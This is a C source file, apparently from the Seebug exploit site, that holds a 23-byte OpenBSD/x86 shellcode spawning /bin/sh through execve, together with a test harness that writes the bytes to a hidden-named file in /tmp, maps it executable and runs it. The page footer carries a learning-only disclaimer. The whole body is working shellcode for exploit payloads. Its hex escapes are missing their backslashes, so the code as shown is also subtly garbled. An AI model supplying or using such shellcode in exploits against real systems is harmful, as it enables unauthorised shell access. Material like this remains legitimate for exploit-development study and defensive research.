/* * [OpenBSD/x86] * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL) * 23 bytes * hophet [at] gmail.com * http://www.nlabs.com.br/~hophet/ * * Fancy mappings by iruata souza (muzgo) * iru.muzgo!gmail.com * http://openvms-rocks.com/~muzgo/ */ #include <sys/types.h> #include <sys/stat.h> #include <sys/mman.h> #include <err.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <unistd.h> char shellcode[] = "x99" /* cltd */ "x52" /* push %edx */ "x68x6ex2fx73x68" /* push $0x68732f6e */ "x68x2fx2fx62x69" /* push $0x69622f2f */ "x89xe3" /* mov %esp,%ebx */ "x52" /* push %edx */ "x54" /* push %esp */ "x53" /* push %ebx */ "x53" /* push %ebx */ "x6ax3b" /* push $0x3b */ "x58" /* pop %eax */ "xcdx80"; /* int $0x80 */ /* * Since shellcode above will be mapped in .rodata (read-only protection), * we need to write it to a file and map the file with PROT_EXEC in order * to execute it. */ int main(void) { void (*p)(); int fd; fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); if(fd < 0) err(1, "open"); write(fd, shellcode, strlen(shellcode)); if((lseek(fd, 0L, SEEK_SET)) < 0) err(1, "lseek"); p = (void (*)())mmap(NULL, strlen(shellcode), PROT_READ|PROT_EXEC, NULL, fd, NULL); if (p == (void (*)())MAP_FAILED) err(1, "mmap"); p(); return 0; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论